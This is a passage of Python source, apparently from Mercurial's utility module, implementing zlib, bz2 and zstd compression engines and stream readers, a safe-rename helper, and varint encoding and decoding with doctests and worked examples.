            self._pending.append(newbuf)
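        # Probe a copy of the decompressor with a dummy byte: if zlib
        # reports that byte back as unused_data, the compressed frame
        # before it was complete, i.e. we have hit end of stream.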
        d = self._decompobj.copy()
        try:
            d.decompress('x')
            d.flush()
            if d.unused_data == 'x':
                self._eof = True
        except zlib.error:
            pass

class _BZ2CompressedStreamReader(_CompressedStreamReader):
    def __init__(self, fh):
        super(_BZ2CompressedStreamReader, self).__init__(fh)
        self._decompobj = bz2.BZ2Decompressor()
    def _decompress(self, chunk):
        newbuf = self._decompobj.decompress(chunk)
        if newbuf:
            self._pending.append(newbuf)
        try:
            while True:
                newbuf = self._decompobj.decompress('')
                if newbuf:
                    self._pending.append(newbuf)
                else:
                    break
        except EOFError:
            self._eof = True

class _TruncatedBZ2CompressedStreamReader(_BZ2CompressedStreamReader):
    def __init__(self, fh):
        super(_TruncatedBZ2CompressedStreamReader, self).__init__(fh)
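        # The truncated format omits the leading 'BZ' magic, so prime the
        # decompressor with it before any real data arrives.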
        newbuf = self._decompobj.decompress('BZ')
        if newbuf:
            self._pending.append(newbuf)

class _ZstdCompressedStreamReader(_CompressedStreamReader):
    def __init__(self, fh, zstd):
        super(_ZstdCompressedStreamReader, self).__init__(fh)
        self._zstd = zstd
        self._decompobj = zstd.ZstdDecompressor().decompressobj()
    def _decompress(self, chunk):
        newbuf = self._decompobj.decompress(chunk)
        if newbuf:
            self._pending.append(newbuf)
        try:
            while True:
                newbuf = self._decompobj.decompress('')
                if newbuf:
                    self._pending.append(newbuf)
                else:
                    break
        except self._zstd.ZstdError:
            self._eof = True

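# Example (illustration only): the readers above turn a file object of
# compressed data back into a plain read(n) interface:
#
#   >>> import io, zlib
#   >>> fh = io.BytesIO(zlib.compress(b'some data'))
#   >>> reader = _GzipCompressedStreamReader(fh)
#   >>> reader.read(4)
#   'some'
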
class _zlibengine(compressionengine):
    def name(self):
        return 'zlib'

    def bundletype(self):
        """zlib compression using the DEFLATE algorithm.

        All Mercurial clients should support this format. The compression
        algorithm strikes a reasonable balance between compression ratio
        and speed.
        """
        return 'gzip', 'GZ'

    def wireprotosupport(self):
        return compewireprotosupport('zlib', 20, 20)

    def revlogheader(self):
        return 'x'

    def compressstream(self, it, opts=None):
        opts = opts or {}

        z = zlib.compressobj(opts.get('level', -1))
        for chunk in it:
            data = z.compress(chunk)
            # Not all calls to compress emit data. It is cheaper to inspect
            # here than to feed empty chunks through generator.
            if data:
                yield data

        yield z.flush()

    def decompressorreader(self, fh):
        return _GzipCompressedStreamReader(fh)

    class zlibrevlogcompressor(object):
        def compress(self, data):
            insize = len(data)
            # Caller handles empty input case.
            assert insize > 0

            if insize < 44:
                return None

            elif insize <= 1000000:
                compressed = zlib.compress(data)
                if len(compressed) < insize:
                    return compressed
                return None

            # zlib makes an internal copy of the input buffer, doubling
            # memory usage for large inputs. So do streaming compression
            # on large inputs.
            else:
                z = zlib.compressobj()
                parts = []
                pos = 0
                while pos < insize:
                    pos2 = pos + 2**20
                    parts.append(z.compress(data[pos:pos2]))
                    pos = pos2
                parts.append(z.flush())

                if sum(map(len, parts)) < insize:
                    return ''.join(parts)
                return None

        def decompress(self, data):
            try:
                return zlib.decompress(data)
            except zlib.error as e:
                raise error.StorageError(_('revlog decompress error: %s') %
                                         stringutil.forcebytestr(e))

    def revlogcompressor(self, opts=None):
        return self.zlibrevlogcompressor()

compengines.register(_zlibengine())

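# Example (illustration only): bundle code looks engines up through the
# global manager; compressstream() and decompressorreader() round-trip:
#
#   >>> import io
#   >>> engine = compengines.forbundletype('GZ')
#   >>> data = b''.join(engine.compressstream(iter([b'data'])))
#   >>> engine.decompressorreader(io.BytesIO(data)).read(4)
#   'data'
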
class _bz2engine(compressionengine):
    def name(self):
        return 'bz2'

    def bundletype(self):
        """An algorithm that produces smaller bundles than ``gzip``.

        All Mercurial clients should support this format.

        This engine will likely produce smaller bundles than ``gzip`` but
        will be significantly slower, both during compression and
        decompression.

        If available, the ``zstd`` engine can yield similar or better
        compression at much higher speeds.
        """
        return 'bzip2', 'BZ'

    # We declare a protocol name but don't advertise by default because
    # it is slow.
    def wireprotosupport(self):
        return compewireprotosupport('bzip2', 0, 0)

    def compressstream(self, it, opts=None):
        opts = opts or {}
        z = bz2.BZ2Compressor(opts.get('level', 9))
        for chunk in it:
            data = z.compress(chunk)
            if data:
                yield data

        yield z.flush()

    def decompressorreader(self, fh):
        return _BZ2CompressedStreamReader(fh)

compengines.register(_bz2engine())

class _truncatedbz2engine(compressionengine):
    def name(self):
        return 'bz2truncated'

    def bundletype(self):
        return None, '_truncatedBZ'

    # We don't implement compressstream because it is hackily handled elsewhere.

    def decompressorreader(self, fh):
        return _TruncatedBZ2CompressedStreamReader(fh)

compengines.register(_truncatedbz2engine())

class _noopengine(compressionengine):
    def name(self):
        return 'none'

    def bundletype(self):
        """No compression is performed.

        Use this compression engine to explicitly disable compression.
        """
        return 'none', 'UN'

    # Clients always support uncompressed payloads. Servers don't because
    # unless you are on a fast network, uncompressed payloads can easily
    # saturate your network pipe.
    def wireprotosupport(self):
        return compewireprotosupport('none', 0, 10)

    # We don't implement revlogheader because it is handled specially
    # in the revlog class.

    def compressstream(self, it, opts=None):
        return it

    def decompressorreader(self, fh):
        return fh

    class nooprevlogcompressor(object):
        def compress(self, data):
            return None

    def revlogcompressor(self, opts=None):
        return self.nooprevlogcompressor()

compengines.register(_noopengine())

class _zstdengine(compressionengine):
    def name(self):
        return 'zstd'

    @propertycache
    def _module(self):
        # Not all installs have the zstd module available. So defer importing
        # until first access.
        try:
            from . import zstd
            # Force delayed import.
            zstd.__version__
            return zstd
        except ImportError:
            return None

    def available(self):
        return bool(self._module)

    def bundletype(self):
        """A modern compression algorithm that is fast and highly flexible.

        Only supported by Mercurial 4.1 and newer clients.

        With the default settings, zstd compression is both faster and yields
        better compression than ``gzip``. It also frequently yields better
        compression than ``bzip2`` while operating at much higher speeds.

        If this engine is available and backwards compatibility is not a
        concern, it is likely the best available engine.
        """
        return 'zstd', 'ZS'

    def wireprotosupport(self):
        return compewireprotosupport('zstd', 50, 50)

    def revlogheader(self):
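        # '\x28' is the first byte of the zstd frame magic
        # (0x28 0xb5 0x2f 0xfd), so it cannot collide with the 'x' (zlib)
        # or 'u' (uncompressed) revlog chunk markers.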
        return '\x28'

    def compressstream(self, it, opts=None):
        opts = opts or {}
        # zstd level 3 is almost always significantly faster than zlib
        # while providing no worse compression. It strikes a good balance
        # between speed and compression.
        level = opts.get('level', 3)

        zstd = self._module
        z = zstd.ZstdCompressor(level=level).compressobj()
        for chunk in it:
            data = z.compress(chunk)
            if data:
                yield data

        yield z.flush()

    def decompressorreader(self, fh):
        return _ZstdCompressedStreamReader(fh, self._module)

    class zstdrevlogcompressor(object):
        def __init__(self, zstd, level=3):
            # TODO consider omitting frame magic to save 4 bytes.
            # This writes content sizes into the frame header. That is
            # extra storage. But it allows a correct size memory allocation
            # to hold the result.
            self._cctx = zstd.ZstdCompressor(level=level)
            self._dctx = zstd.ZstdDecompressor()
            self._compinsize = zstd.COMPRESSION_RECOMMENDED_INPUT_SIZE
            self._decompinsize = zstd.DECOMPRESSION_RECOMMENDED_INPUT_SIZE

        def compress(self, data):
            insize = len(data)
            # Caller handles empty input case.
            assert insize > 0

            if insize < 50:
                return None

            elif insize <= 1000000:
                compressed = self._cctx.compress(data)
                if len(compressed) < insize:
                    return compressed
                return None
            else:
                z = self._cctx.compressobj()
                chunks = []
                pos = 0
                while pos < insize:
                    pos2 = pos + self._compinsize
                    chunk = z.compress(data[pos:pos2])
                    if chunk:
                        chunks.append(chunk)
                    pos = pos2
                chunks.append(z.flush())

                if sum(map(len, chunks)) < insize:
                    return ''.join(chunks)
                return None

        def decompress(self, data):
            insize = len(data)

            try:
                # This was measured to be faster than other streaming
                # decompressors.
                dobj = self._dctx.decompressobj()
                chunks = []
                pos = 0
                while pos < insize:
                    pos2 = pos + self._decompinsize
                    chunk = dobj.decompress(data[pos:pos2])
                    if chunk:
                        chunks.append(chunk)
                    pos = pos2
                # Frame should be exhausted, so no finish() API.

                return ''.join(chunks)
            except Exception as e:
                raise error.StorageError(_('revlog decompress error: %s') %
                                         stringutil.forcebytestr(e))

    def revlogcompressor(self, opts=None):
        opts = opts or {}
        return self.zstdrevlogcompressor(self._module,
                                         level=opts.get('level', 3))

compengines.register(_zstdengine())

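# Example (illustration only, assuming the bundled zstd module imports
# cleanly): server-side wire protocol ordering follows the declared
# priorities, with the engine name as tiebreaker:
#
#   >>> [e.name() for e in compengines.supportedwireengines(SERVERROLE)]
#   ['zstd', 'zlib', 'bzip2', 'none']
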
def bundlecompressiontopics():
    """Obtains a mapping of available bundle compressions for use in help."""
    # help.makeitemsdocs() expects a dict of names to items with a .__doc__.
    items = {}

    # We need to format the docstring. So use a dummy object/type to hold it
    # rather than mutating the original.
    class docobject(object):
        pass

    for name in compengines:
        engine = compengines[name]

        if not engine.available():
            continue

        bt = engine.bundletype()
        if not bt or not bt[0]:
            continue

        doc = b'``%s``\n    %s' % (bt[0], pycompat.getdoc(engine.bundletype))

        value = docobject()
        value.__doc__ = pycompat.sysstr(doc)
        value._origdoc = engine.bundletype.__doc__
        value._origfunc = engine.bundletype

        items[bt[0]] = value

    return items

i18nfunctions = bundlecompressiontopics().values()

# convenient shortcut
dst = debugstacktrace

def safename(f, tag, ctx, others=None):
    """
    Generate a name that is safe to rename f to in the given context.

    f: filename to rename
    tag: a string tag that will be included in the new name
    ctx: a context, in which the new name must not exist
    others: a set of other filenames that the new name must not be in

    Returns a file name of the form oldname~tag[~number] which does not exist
    in the provided context and is not in the set of other names.
    """
    if others is None:
        others = set()

    fn = '%s~%s' % (f, tag)
    if fn not in ctx and fn not in others:
        return fn
    for n in itertools.count(1):
        fn = '%s~%s~%s' % (f, tag, n)
        if fn not in ctx and fn not in others:
            return fn

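# Example (illustration only): safename('foo', 'base', ctx) first tries
# 'foo~base'; if ctx (or ``others``) already contains that name, it tries
# 'foo~base~1', 'foo~base~2', ... until a free name is found.
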
def readexactly(stream, n):
    '''read n bytes from stream.read and abort if less was available'''
    s = stream.read(n)
    if len(s) < n:
        raise error.Abort(_("stream ended unexpectedly"
                            " (got %d bytes, expected %d)")
                          % (len(s), n))
    return s

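# Example (illustration only):
#
#   >>> import io
#   >>> readexactly(io.BytesIO(b'abc'), 2)
#   'ab'
#   >>> readexactly(io.BytesIO(b'abc'), 5)
#   Traceback (most recent call last):
#   ...
#   Abort: stream ended unexpectedly (got 3 bytes, expected 5)
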
def uvarintencode(value):
    """Encode an unsigned integer value to a varint.

    A varint is a variable length integer of 1 or more bytes. Each byte
    except the last has the most significant bit set. The lower 7 bits of
    each byte store the integer's value, least significant group first.

    >>> uvarintencode(0)
    '\\x00'
    >>> uvarintencode(1)
    '\\x01'
    >>> uvarintencode(127)
    '\\x7f'
    >>> uvarintencode(1337)
    '\\xb9\\n'
    >>> uvarintencode(65536)
    '\\x80\\x80\\x04'
    >>> uvarintencode(-1)
    Traceback (most recent call last):
        ...
    ProgrammingError: negative value for uvarint: -1
    """
    if value < 0:
        raise error.ProgrammingError('negative value for uvarint: %d'
                                     % value)
    bits = value & 0x7f
    value >>= 7
    bytes = []
    while value:
        bytes.append(pycompat.bytechr(0x80 | bits))
        bits = value & 0x7f
        value >>= 7
    bytes.append(pycompat.bytechr(bits))

    return ''.join(bytes)

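# Worked example: 1337 is 0b10100111001. The low 7 bits (0x39) are emitted
# first with the continuation bit set (0x80 | 0x39 = 0xb9), and the
# remaining bits (1337 >> 7 = 10 = 0x0a) form the final byte, giving
# '\xb9\n' as in the doctest above.
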
def uvarintdecodestream(fh):
    """Decode an unsigned variable length integer from a stream.

    The passed argument is anything that has a ``.read(N)`` method.

    >>> try:
    ...     from StringIO import StringIO as BytesIO
    ... except ImportError:
    ...     from io import BytesIO
    >>> uvarintdecodestream(BytesIO(b'\\x00'))
    0
    >>> uvarintdecodestream(BytesIO(b'\\x01'))
    1
    >>> uvarintdecodestream(BytesIO(b'\\x7f'))
    127
    >>> uvarintdecodestream(BytesIO(b'\\xb9\\n'))
    1337
    >>> uvarintdecodestream(BytesIO(b'\\x80\\x80\\x04'))
    65536
    >>> uvarintdecodestream(BytesIO(b'\\x80'))
    Traceback (most recent call last):
        ...
    Abort: stream ended unexpectedly (got 0 bytes, expected 1)
    """
    result = 0
    shift = 0
    while True:
        byte = ord(readexactly(fh, 1))
        result |= ((byte & 0x7f) << shift)
        if not (byte & 0x80):
            return result
        shift += 7
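
# Worked example: decoding '\xb9\n' reads 0xb9 first; its continuation bit
# is set, so the low bits (0x39 = 57) land at shift 0. The next byte 0x0a
# has no continuation bit and contributes 10 << 7 = 1280, for a total of
# 1280 + 57 = 1337.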